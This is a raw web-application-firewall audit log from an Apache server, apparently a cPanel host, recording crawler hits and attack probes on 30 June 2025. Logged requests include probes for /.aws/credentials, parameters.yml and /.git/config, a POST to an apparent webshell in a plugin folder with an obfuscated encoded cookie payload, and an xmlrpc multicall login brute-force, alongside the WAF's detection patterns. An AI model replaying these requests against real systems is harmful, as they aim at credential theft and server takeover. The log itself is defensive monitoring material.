/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --f6afda17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f6afda17-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281543464866 18768 (- - -) Stopwatch2: 1751281543464866 18768; combined=4346, p1=219, p2=3992, p3=0, p4=0, p5=135, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1db7a80d-Z-- --7a588c78-A-- [30/Jun/2025:16:35:54.580495 +0530] aGJvkn3h_Nu4NETt1nnNTAAAABI 192.253.209.91 18507 192.168.74.40 443 --7a588c78-B-- GET /.aws/credentials HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --7a588c78-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7a588c78-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281554519651 61095 (- - -) Stopwatch2: 1751281554519651 61095; combined=5296, p1=147, p2=4949, p3=0, p4=0, p5=200, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7a588c78-Z-- --d877e415-A-- [30/Jun/2025:16:35:59.254072 +0530] aGJvl0PJtoHs37kYh_RyzQAAAA8 20.171.207.232 34002 192.168.74.40 443 --d877e415-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d877e415-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d877e415-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281559236448 17907 (- - -) Stopwatch2: 1751281559236448 17907; combined=4311, p1=167, p2=3962, p3=0, p4=0, p5=181, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d877e415-Z-- --f2571e65-A-- [30/Jun/2025:16:36:03.559719 +0530] aGJvm9Uk2D1X90O_KpVjrgAAACc 192.253.209.89 11753 192.168.74.40 443 --f2571e65-B-- GET /app/config/parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --f2571e65-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f2571e65-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/app/config/parameters.yml||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281563505026 55003 (- - -) Stopwatch2: 1751281563505026 55003; combined=4893, p1=114, p2=4623, p3=0, p4=0, p5=155, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2571e65-Z-- --c37c1e23-A-- [30/Jun/2025:16:36:04.712015 +0530] aGJvnDX-tSYHdPnvNLtyNgAAACQ 162.240.226.172 47466 192.168.74.40 443 --c37c1e23-B-- POST /wp-content/plugins/metform/core/integrations/onboard/controls/settings/usergroup_5.php HTTP/1.1 Host: lovedale.us Cookie: 33=kzgqpeXepm0giSSeVBERw0kSVaiPSTqfnszfdlzAmozGcxpAWqZpMKPrPHRAredeXiIHYbxn0iBqlYuJIVfVsNwvGMHowvjFKsAPpmrbxKZxhuwCiwUHNuYBsutPgIlnTYMse0zvxzGWkugiIxDWrOOghslJgpgIWMr_XcVCamfjzfuKsDNNVFhiRWXSIMXuolCalcNeUTAe0OvnbQEZJkshCJQwvQFoecsFecNsWSshvrCeQXYxssmVywIgqrikYWTnOwzdoxfPIQLBnUnobTwHRZpP_rLbCzMYKNsImCJxdBmsadtYeaOpbxvSBsqzfEQXeWeUVYeTcx_yXDKXEsgJpfwtHHiJVnalzZyoFVQDtuTjnDGTTah0KuhHakDpeL0nRhBDYUzisuUkEStFdgtYPzKTbalGriYgGufawX_BBgrGAMjMriPYuKwldzoKdGhHTaddtnLnxLGxHq1CxhYJxIcC30dOARbTaVgw0KCAyUnmUZa0OADVZuSEC<UyerKPDSH?KXxBcDqJqpxHDLCRNqLhvmytWUdhMpflItanvCO 0EutZLigNp/TpfsUxvBl_nBeHOgnLPMTfPyjvkjkQrTadAceWwLqiFwXMLMpfgfHWoxhdLPvOgjuZCPCQWmcGEbtNZiQdjrAqsqkIvOZmEbEYwdeVArTNkVMuozHuiagwFLGVUtGhGNQtrmhNYBjQkV0zUAVUmNMBi0QCgGhWIfpV0MUSvyVfBpK0feOwMSASnS0yhdvOxFOnM0EEpixwamcY0OFWQnntXQt0XkKbhESRvj0YlihnletObrIyVWiEmqaMLNRMyFJnspHiOMYlYBeTdofhpbPi6atfyOoKTn4YlGmcgvaJ_cwAHDSyjedInPBugWKfeMTMDhlVKUcXziArfDBJoucRMIAMRxdSqKNYZvqWe0cEDltBsrNS0asOVHxptNE0YpBfEfWbte0azvwZZTfNP0wADTZiugkE0CfjRTrUijZ0RRiBqkiUMb0GehyDCDcTw0SwTprDzLas00; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9Vwj/pTujVPVhLzSmMGL0K2EyL29xMFumqUWspz90ZGZbWS9DG1AHJlWzJvWqXFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAyoaEypvV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7 sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 307 Content-Type: application/x-www-form-urlencoded --c37c1e23-C-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c37c1e23-Z-- --993ec83a-A-- [30/Jun/2025:16:36:05.283984 +0530] aGJvncxQ4V_D3FfouOGiQQAAACs 192.253.209.57 53389 192.168.74.40 443 --993ec83a-B-- GET /config/parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --993ec83a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --993ec83a-H-- Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281565236988 47385 (- - -) Stopwatch2: 1751281565236988 47385; combined=4891, p1=119, p2=4579, p3=0, p4=0, p5=193, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --993ec83a-Z-- --f857fc15-A-- [30/Jun/2025:16:36:06.167263 +0530] aGJvnkPJtoHs37kYh_Ry0wAAAA8 20.171.207.232 34002 192.168.74.40 443 --f857fc15-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f857fc15-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f857fc15-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281566149740 17685 (- - -) Stopwatch2: 1751281566149740 17685; combined=4110, p1=185, p2=3775, p3=0, p4=0, p5=149, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f857fc15-Z-- --1748460e-A-- [30/Jun/2025:16:36:06.724843 +0530] aGJvnkQBPIomKAIQWO76PQAAABw 192.253.209.77 24105 192.168.74.40 443 --1748460e-B-- GET /parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --1748460e-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1748460e-H-- Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281566672524 52507 (- - -) Stopwatch2: 1751281566672524 52507; combined=4357, p1=109, p2=4066, p3=0, p4=0, p5=182, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1748460e-Z-- --616e9165-A-- [30/Jun/2025:16:36:08.694247 +0530] aGJvoEPJtoHs37kYh_Ry1QAAAA8 20.171.207.232 34002 192.168.74.40 443 --616e9165-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --616e9165-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --616e9165-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281568677074 17316 (- - -) Stopwatch2: 1751281568677074 17316; combined=3195, p1=134, p2=2892, p3=0, p4=0, p5=168, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ccb34318-Z-- --5fcb4249-A-- [30/Jun/2025:16:36:37.730695 +0530] aGJvvZwY0sPO8y2GDN8isAAAAEE 192.253.209.57 19897 192.168.74.40 443 --5fcb4249-B-- GET /.__info.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --5fcb4249-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5fcb4249-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281597675282 55733 (- - -) Stopwatch2: 1751281597675282 55733; combined=4407, p1=95, p2=4105, p3=0, p4=0, p5=207, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5fcb4249-Z-- --474fa00b-A-- [30/Jun/2025:16:36:39.028222 +0530] aGJvvoTZFPsrPJex9_HiJAAAABA 192.253.209.75 8221 192.168.74.40 443 --474fa00b-B-- GET /.info.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --474fa00b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --474fa00b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281598976233 52445 (- - -) Stopwatch2: 1751281598976233 52445; combined=5148, p1=114, p2=4879, p3=0, p4=0, p5=154, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --474fa00b-Z-- --8a6a695f-A-- [30/Jun/2025:16:36:47.695534 +0530] aGJvx6DP8LSAIpsv_Tt3aAAAAAk 20.171.207.232 44296 192.168.74.40 443 --8a6a695f-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8a6a695f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a6a695f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281607676403 19227 (- - -) Stopwatch2: 1751281607676403 19227; combined=4268, p1=165, p2=3921, p3=0, p4=0, p5=182, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5c5a6f7e-Z-- --c1cc992a-A-- [30/Jun/2025:16:42:10.468188 +0530] aGJxCZfZSveyRzhF9t0ojQAAAAU 196.251.80.2 38118 192.168.74.40 443 --c1cc992a-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --c1cc992a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c1cc992a-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281929904910 563513 (- - -) Stopwatch2: 1751281929904910 563513; combined=4495, p1=106, p2=4247, p3=0, p4=0, p5=142, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c1cc992a-Z-- --25964162-A-- [30/Jun/2025:16:42:11.710456 +0530] aGJxCzBzgd_O0rYT2N05XgAAACk 34.86.223.42 64122 192.168.74.40 443 --25964162-B-- POST //xmlrpc.php HTTP/1.1 Host: elliottlabsindia.com Keep-Alive: 300 Connection: keep-alive Cookie: pikoworks_products_list_per_page=5; pikoworks_products_grid_per_page=9; pikoworks_products_mode_view=grid User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 489 --25964162-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>z43218765z</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --25964162-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex, follow -- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751283903241283 8141 (- - -) Stopwatch2: 1751283903241283 8141; combined=5149, p1=132, p2=4745, p3=115, p4=4, p5=153, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dfa8d57b-Z-- --b8fa854c-A-- [30/Jun/2025:17:15:05.287948 +0530] aGJ4v4EbmuRAqClpHrE-8wAAABw 103.185.74.40 31399 192.168.74.40 443 --b8fa854c-B-- PURGE /.* 